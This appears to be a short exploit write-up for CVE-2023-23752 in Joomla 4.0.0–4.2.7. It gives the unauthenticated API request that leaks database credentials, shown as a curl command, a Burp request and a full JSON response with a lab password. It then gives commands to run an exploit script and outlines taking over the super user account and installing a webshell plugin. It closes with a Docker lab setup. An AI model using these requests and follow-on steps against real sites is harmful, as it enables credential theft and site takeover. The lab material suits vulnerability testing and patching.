CVE-2023–23752 Joomla! | Improper unauthorized file access
Version 4.0.0 a 4.2.7
Score 5.3 MEDIUM
For more information on fixing the bug: https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
Example:
root@server:/# curl http://localhost:8080/api/index.php/v1/config/application?public=true
{“links”:{“self”:”http://localhost:8080/api/index.php/v1/config/application?public=true","next":"http://localhost:8080/api/index.php/v1/config/applicationpublic=true&page%5Boffset%5D=20&page%5Blimit%5D=20","last":"http://localhost:8080/api/index.php/v1/config/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"},"data":[{"type":"application","id":"224","attributes":{"offline":false,"id":224}},{"type":"application","id":"224","attributes":{"offline_message":"Este site est\u00e1 fora do ar para manuten\u00e7\u00e3o.
Por favor, verifique novamente em breve.”,”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“display_offline_message”:1,”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“offline_image”:””,”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“sitename”:”CVEpedia”,”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“editor”:”tinymce”,”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“captcha”:”0",”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“list_limit”:20,”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“access”:1,”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“debug”:false,”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“debug_lang”:false,”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“debug_lang_const”:true,”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“dbtype”:”mysqli”,”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“host”:”joomladb”,”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“user”:”root”,”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“password”:”123pass123",”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“db”:”joomla_db”,”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“dbprefix”:”f4jpq_”,”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“dbencryption”:0,”id”:224}},{“type”:”application”,”id”:”224",”attributes”:{“dbsslverifyservercert”:false,”id”:224}}],”meta”:{“total-pages”:4}}
The Fault
The flaw allows improper access to the specific endpoint by displaying database credentials in clear text.
The vulnerable URL:
http://<IP_VICTIM>:8080/api/index.php/v1/config/application?public=true
Failed by Burp
GET /api/index.php/v1/config/application?public=true HTTP/1.1
Host: localhost:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: closeIn Curl
curl http://localhost:8080/api/index.php/v1/config/application?public=trueExploit
git clone https://github.com/luisfelipesec/CVEpedia/tree/main/CVE-2023-23752
cd CVE-2023-23752
chmod +x CVE-2023-23752.sh
./CVE-2023-23752.sh localhost 8080It is possible to access the MYSQL database with the credentials obtained and collect information about the super user’s name and/or change the password.
Privilege Escalation
Through Brute Force in the Super User or changing the password through Mysql https://vulncheck.com/blog/joomla-for-rce
Installing a WebShell via plugins
https://github.com/p0dalirius/Joomla-webshell-plugin
Tips:
Creating a Testing Environment via Docker
Using yml file
version: '3.1'
services:
joomla:
image: joomla:4.2.7-php8.1-apache
restart: always
links:
- joomladb:mysql
ports:
- 8080:80
environment:
JOOMLA_DB_HOST: joomladb
JOOMLA_DB_PASSWORD: 123pass123
joomladb:
image: mysql:5.6
restart: always
environment:
MYSQL_ROOT_PASSWORD: 123pass123The vulnerable URL:
http://<IP_VICTIM>:8080/api/index.php/v1/config/application?public=true
